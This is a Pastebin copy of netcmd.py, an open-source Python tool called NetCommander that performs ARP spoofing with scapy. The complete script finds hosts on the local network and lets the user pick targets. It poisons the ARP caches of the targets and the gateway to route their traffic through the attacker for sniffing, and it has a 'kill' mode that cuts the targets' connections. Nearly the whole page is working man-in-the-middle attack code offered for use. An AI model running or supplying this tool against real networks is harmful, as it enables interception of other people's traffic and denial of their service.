Advertisement
opexxx

netcmd.py

May 19th, 2014
393
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.93 KB | None | 0 0
  1. #!/usr/bin/python
  2. # This file is part of NetCommander.
  3. #
  4. # Copyright(c) 2010-2011 Simone Margaritelli
  5. # http://www.evilsocket.net
  6. # http://www.backbox.org
  7. #
  8. # This file may be licensed under the terms of of the
  9. # GNU General Public License Version 2 (the ``GPL'').
  10. #
  11. # Software distributed under the License is distributed
  12. # on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
  13. # express or implied. See the GPL for the specific language
  14. # governing rights and limitations.
  15. #
  16. # You should have received a copy of the GPL along with this
  17. # program. If not, go to http://www.gnu.org/licenses/gpl.html
  18. # or write to the Free Software Foundation, Inc.,
  19. # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
  20. import logging
  21. import time
  22. import os
  23. import sys
  24. import atexit
  25. import re
  26. from optparse import OptionParser
  27. import warnings
  28.  
  29. # ignore deprecation warnings from scapy inclusion
  30. warnings.filterwarnings( "ignore", category = DeprecationWarning )
  31. # disable scapy warnings about ipv6 and shit like that
  32. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  33.  
  34. from scapy.all import srp,Ether,ARP,conf,sendp,ltoa,atol
  35.  
  36. class NetCmd:
  37.  
  38.   def __bit_count( self, n ):
  39.     bits = 0
  40.     while n:
  41.       bits += n & 1
  42.       n   >>= 1
  43.     return bits
  44.  
  45.   def __set_forwarding( self, status ):
  46.     # Mac OS X
  47.     if sys.platform == 'darwin':
  48.       p = os.popen( "sysctl -w net.inet.ip.forwarding=%s" % '1' if status == True else '0' )
  49.       output = p.readline()
  50.       p.close()
  51.  
  52.       if status and not re.match( r'net\.inet\.ip\.forwarding:\s+\d\s+\->\s+\d', output ):
  53.         raise Exception( "Unexpected output '%s' while turning ip forwarding." % output )
  54.     # Linux
  55.     else:
  56.       if not os.path.exists( '/proc/sys/net/ipv4/ip_forward' ):
  57.         raise Exception( "'/proc/sys/net/ipv4/ip_forward' not found, this is not a compatible operating system." )
  58.      
  59.       fd = open( '/proc/sys/net/ipv4/ip_forward', 'w+' )
  60.       fd.write( '1' if status == True else '0' )
  61.       fd.close()
  62.  
  63.   def __preload_mac_table( self ):
  64.     if os.path.exists( 'mac-prefixes' ):
  65.       print "@ Preloading MAC table ..."
  66.  
  67.       fd = open( 'mac-prefixes' )
  68.       for line in iter(fd):
  69.         ( prefix, vendor ) = line.strip().split( ' ', 1 )
  70.         self.mac_prefixes[prefix] = vendor
  71.  
  72.       fd.close()
  73.  
  74.   def __find_mac_vendor( self, mac ):
  75.     mac = mac.replace( ':', '' ).upper()[:6]
  76.     try:
  77.       return self.mac_prefixes[mac]
  78.     except KeyError as e:
  79.       return ''  
  80.  
  81.   def find_alive_hosts( self ):
  82.     self.gateway_hw = None
  83.     self.endpoints  = []
  84.    
  85.     print "@ Searching for alive network endpoints ..."
  86.  
  87.     # broadcast arping ftw
  88.     ans,unans = srp( Ether( dst = "ff:ff:ff:ff:ff:ff" ) / ARP( pdst = self.network ),
  89.                      verbose = False,
  90.                      filter  = "arp and arp[7] = 2",
  91.                      timeout = 2,
  92.                      iface_hint = self.network )
  93.  
  94.     for snd,rcv in ans:
  95.       if rcv.psrc == self.gateway:
  96.         self.gateway_hw = rcv.hwsrc
  97.       else:
  98.         self.endpoints.append( ( rcv.hwsrc, rcv.psrc ) )
  99.      
  100.     if self.endpoints == [] and not self.all:
  101.       raise Exception( "Could not find any network alive endpoint." )
  102.  
  103.   def __init__( self, interface, gateway = None, network = None, kill = False, all = False ):
  104.     # scapy, you're pretty cool ... but shut the fuck up bitch!
  105.     conf.verb = 0
  106.  
  107.     self.interface    = interface
  108.     self.network      = network
  109.     self.targets      = []
  110.     self.gateway      = gateway
  111.     self.all          = all
  112.     self.gateway_hw   = None
  113.     self.packets      = []
  114.     self.restore      = []
  115.     self.endpoints    = []
  116.     self.mac_prefixes = {}
  117.  
  118.     if not os.geteuid() == 0:
  119.       raise Exception( "Only root can run this script." )
  120.  
  121.     self.__preload_mac_table()
  122.    
  123.     print "@ Searching for the network gateway address ..."
  124.  
  125.     # for route in conf.route.routes:
  126.     for net, msk, gw, iface, addr in conf.route.routes:
  127.       # found a route for given interface
  128.       if iface == self.interface:
  129.         network = ltoa( net )
  130.         # compute network representation if not yet done
  131.         if network.split('.')[0] == addr.split('.')[0]:
  132.           bits = self.__bit_count( msk )
  133.           self.network = "%s/%d" % ( network, bits )
  134.         # search for a valid network gateway
  135.         if self.gateway is None and gw != '0.0.0.0':
  136.           self.gateway = gw
  137.    
  138.     if self.gateway is not None and self.network is not None:
  139.       print "@ Gateway is %s on network %s ." % ( self.gateway, self.network )
  140.     else:
  141.       raise Exception( "Could not find any network gateway." )
  142.  
  143.     self.find_alive_hosts()
  144.  
  145.     print "@ Please choose your target :"
  146.     choice = None
  147.    
  148.     if all:
  149.       self.targets = self.endpoints
  150.     else:
  151.       while choice is None:
  152.         for i, item in enumerate( self.endpoints ):
  153.           ( mac, ip ) = item
  154.           vendor      = self.__find_mac_vendor( mac )
  155.           print "  [%d] %s %s %s" % ( i, mac, ip, "( %s )" % vendor if vendor else '' )
  156.         choice = raw_input( "@ Choose [0-%d] (* to select all, r to refresh): " % (len(self.endpoints) - 1) )
  157.         try:
  158.           choice = choice.strip()
  159.           if choice == '*':
  160.             self.targets = self.endpoints
  161.           elif choice.lower() == 'r':
  162.             choice = None
  163.             self.find_alive_hosts()
  164.           else:
  165.             self.targets.append( self.endpoints[ int(choice) ] )
  166.         except Exception as e:
  167.           print "@ Invalid choice!"
  168.           choice = None
  169.  
  170.     self.craft_packets()
  171.      
  172.     if not kill:
  173.       print "@ Enabling ipv4 forwarding system wide ..."
  174.       self.__set_forwarding( True )
  175.     else:
  176.       print "@ Disabling ipv4 forwarding system wide to kill target connections ..."
  177.       self.__set_forwarding( False )
  178.    
  179.     atexit.register( self.restore_cache )
  180.  
  181.   def craft_packets( self ):
  182.     # craft packets to accomplish a full forwarding:
  183.     #   gateway -> us -> target
  184.     #   target  -> us -> gateway
  185.     for target in self.targets:
  186.       self.packets.append( Ether( dst = self.gateway_hw ) / ARP( op = "who-has", psrc = target[1],    pdst = self.gateway ) )
  187.       self.packets.append( Ether( dst = target[0] )       / ARP( op = "who-has", psrc = self.gateway, pdst = target[1] ) )
  188.       # and packets to restore the cache later
  189.       self.restore.append( Ether( src = target[0],       dst = self.gateway_hw ) / ARP( op = "who-has", psrc = target[1],    pdst = self.gateway ) )
  190.       self.restore.append( Ether( src = self.gateway_hw, dst = target[0] )       / ARP( op = "who-has", psrc = self.gateway, pdst = target[1] ) )
  191.    
  192.   def restore_cache( self ):
  193.     os.write( 1, "\n@ Restoring ARP cache " )
  194.     for i in range(5):
  195.       for packet in self.restore:
  196.         sendp( packet, iface_hint = self.gateway )
  197.       os.write( 1, '.' )
  198.       time.sleep(1)
  199.     os.write( 1, "\n" )
  200.  
  201.     self.__set_forwarding( False )
  202.    
  203.   def spoof( self ):
  204.     if self.all and self.targets != self.endpoints:
  205.       self.targets = self.endpoints
  206.       self.craft_packets()
  207.  
  208.     for packet in self.packets:
  209.       sendp( packet, iface_hint = self.gateway )
  210.  
  211. try:
  212.   print "\n\tNetCommander 1.3 - An easy to use arp spoofing tool.\n \
  213. \tCopyleft Simone Margaritelli <[email protected]>\n \
  214. \thttp://www.evilsocket.net\n\thttp://www.backbox.org\n";
  215.          
  216.   parser = OptionParser( usage = "usage: %prog [options]" )
  217.  
  218.   parser.add_option( "-I", "--iface",   action="store",      dest="iface",   default=conf.iface, help="Network interface to use if different from the default one." );
  219.   parser.add_option( "-N", "--network", action="store",      dest="network", default=None,       help="Network to work on." );
  220.   parser.add_option( "-G", "--gateway", action="store",      dest="gateway", default=None,       help="Gateway to use." );
  221.   parser.add_option( "-K", "--kill",    action="store_true", dest="kill",    default=False,      help="Kill targets connections instead of forwarding them." )
  222.   parser.add_option( "-D", "--delay",   action="store",      dest="delay",   default=5,          help="Delay in seconds between one arp packet and another, default is 5." )
  223.   parser.add_option( "-A", "--all",     action="store_true", dest="all",     default=False,      help="Keep spoofing and spoof all connected and later connected interfaces." )
  224.  
  225.   (o, args) = parser.parse_args()
  226.  
  227.   ncmd = NetCmd( o.iface, o.gateway, o.network, o.kill, o.all )
  228.  
  229.   if not o.kill:
  230.     os.write( 1, "@ Spoofing, launch your preferred network sniffer to see target traffic " )
  231.   else:
  232.     os.write( 1, "@ Killing target connections " )
  233.  
  234.   slept = 0
  235.   while 1:
  236.     ncmd.spoof()
  237.     os.write( 1, '.' )
  238.     time.sleep( o.delay )
  239.     slept += 1
  240.  
  241.     if o.all and slept > 10:
  242.       ncmd.restore_cache()
  243.       ncmd.find_alive_hosts()
  244.       slept = 0
  245.  
  246. except KeyboardInterrupt:
  247.   pass
  248. except Exception as e:
  249.   print "@ ERROR : %s" % e
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement